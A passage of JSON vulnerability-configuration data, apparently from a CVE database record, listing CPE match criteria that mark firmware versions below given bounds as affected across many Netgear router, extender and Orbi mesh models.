"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58E68C65-9685-40E8-8D51-6C922232168B",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD73CBDF-0B17-4B1A-8A06-9F3926D1D113",
"versionEndExcluding": "1.0.1.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0A0D49BA-4843-4F7E-984A-FF7BDF292F56",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C35893A-C6C2-45C7-B3AF-BCFA62381BE5",
"versionEndExcluding": "1.0.1.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C329B7CB-1281-480D-BDDB-E222044D715E",
"versionEndExcluding": "1.0.3.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FDF9C0E1-7128-4052-B05E-3DD3394208A0",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "373DD028-D307-4B4A-9C35-DDC9366F481F",
"versionEndExcluding": "1.0.0.108",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "411A0637-1498-4376-B10D-004D096EC4F6",
"versionEndExcluding": "1.0.0.108",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex2700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "733650A8-D797-43B2-851E-1B364C9E7100",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex2700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5341B659-DE7D-43F1-954D-82049CBE18AD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0864CF6F-C025-44FE-B00F-83E14ACE1F8F",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B760484C-0D85-49BF-AA5D-2DB0A3A5D7E6",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E8357471-53D2-4FCF-85CD-7D4297960841",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC89483B-6D99-4A1B-A513-B50EA44DA963",
"versionEndExcluding": "1.0.1.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "88DD070C-7CBD-48A5-8D77-7C3D1C502D65",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "23EA7CC1-B1E8-431F-B4AF-8393B85F26E3",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "18C88DDC-92C2-400E-8269-88A0EA65A98A",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "542F7529-27DB-41F1-A8E4-FA7A596E5DCC",
"versionEndExcluding": "1.0.1.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "49846803-C6FB-4DD3-ADA7-78B9923536F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3223C7E1-06DF-4CAA-89DD-611435165F49",
"versionEndExcluding": "1.0.1.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0A1B4BD-9DD6-4999-B0FA-F843713C991F",
"versionEndExcluding": "1.0.2.136",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1289BBB4-1955-46A4-B5FE-BF11153C24F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2138C164-530B-4F97-8107-035F9D0852B0",
"versionEndExcluding": "1.0.2.136",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F285D60D-A5DA-4467-8F79-15EF8135D007",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F6F80A7-3B51-46FD-854E-D848F7906048",
"versionEndExcluding": "1.0.1.180",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFF5F80A-5196-4585-9993-6D985561B75E",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA66D07-D017-49D6-8E72-5C48E940DE1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A59BA256-2D2F-4930-9033-D312BA01D1FB",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B2CAEA32-6934-4743-9E6B-22D52AC5E7F8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs50_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BD22FA4E-1D05-4A83-9610-731957A96A96",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs50:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3BCFD959-D522-4FA0-AD01-2937DAEE1EDF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbk40_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "14BE7862-3CBB-472E-9339-1435999C57F9",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbk40:-:*:*:*:*:*:*:*",
"matchCriteriaId": "12DDD83C-6FF1-433F-ACA1-7B4B147F9A8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr40_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FCEC68E-0BD3-47E6-AD24-EE9076654B86",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr40:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A9E20E59-2B1E-4E43-A494-2C20FD716D4F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs40_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "00C4765D-D903-4967-91D2-11F59458EBCD",
"versionEndExcluding": "2.1.4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs40:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FDCDE39-0355-43B9-BF57-F3718DA2988D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbw30_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE0E9E59-4F1F-490B-BCE8-B3690593353B",
"versionEndExcluding": "2.2.1.204",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbw30:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FEA73D22-970D-45F2-81F3-9576C04CCC94",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50E2E26A-200E-4D00-9657-034EACE3944F",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "27FC1738-5A2C-4D4B-944C-1EB1A8D2476E",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442B71BC-D2D4-4F0F-8962-B50D5E8D2833",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "92F53D21-C688-4477-815D-EFFF08F7D085",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D18D2CCD-424F-41D5-919B-E22B9FA68D36",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "51FC4898-BF35-443A-A003-40351B20ADEC",
"versionEndExcluding": "1.1.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1DD1F7D-7556-4B95-A33F-E389948D20AA",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E997B769-B2F7-4BB5-A834-96A68EF842BA",
"versionEndExcluding": "1.0.4.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF638167-B018-4140-B115-C65F387EFD77",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91532716-831D-401C-8707-86785F0A4E16",
"versionEndExcluding": "1.0.2.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "732F20CF-135F-4CBF-988F-215B534994B1",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4A4FB8A1-D380-4234-88EB-91BFF6D215C7",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C39CE79-6433-47E2-A439-9AB1DFBD843C",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB6992BA-B0F5-4E00-84F4-0B0336910AFA",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BAAD2F7-BF0A-412B-BC2E-A69DC9BCB52E",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E453D3AE-A218-4791-BB19-79C2CF6EC6F8",
"versionEndExcluding": "1.0.9.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
